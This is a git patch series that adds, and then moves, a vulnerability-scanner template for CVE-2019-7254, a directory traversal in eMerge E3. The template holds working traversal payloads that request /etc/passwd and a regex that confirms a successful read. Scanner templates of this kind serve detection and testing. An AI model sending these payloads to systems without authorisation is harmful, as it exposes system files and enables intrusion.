From 1a2e001b935857d7df3f8470e705bbecf785ca17 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Sun, 13 Jun 2021 19:05:02 +0900 Subject: [PATCH 1/2] Create CVE-2019-7254.yaml --- CVE-2019-7254.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 CVE-2019-7254.yaml diff --git a/CVE-2019-7254.yaml b/CVE-2019-7254.yaml new file mode 100644 index 0000000000..db8efe55ac --- /dev/null +++ b/CVE-2019-7254.yaml @@ -0,0 +1,25 @@ +id: CVE-2019-7254 + +info: + name: eMerge E3 1.00-06 - Unauthenticated Directory Traversal + author: 0x_Akoko + severity: high + reference: https://www.exploit-db.com/exploits/47616 + tags: emerge,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/?c=../../../../../../etc/passwd%00" + - "{{BaseURL}}/badging/badge_print_v0.php?tpl=../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From 8df5f982f32d79553cef4d54385777581fa542a2 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 13 Jun 2021 21:01:21 +0530 Subject: [PATCH 2/2] Moved template to cves --- CVE-2019-7254.yaml => cves/2019/CVE-2019-7254.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename CVE-2019-7254.yaml => cves/2019/CVE-2019-7254.yaml (100%) diff --git a/CVE-2019-7254.yaml b/cves/2019/CVE-2019-7254.yaml similarity index 100% rename from CVE-2019-7254.yaml rename to cves/2019/CVE-2019-7254.yaml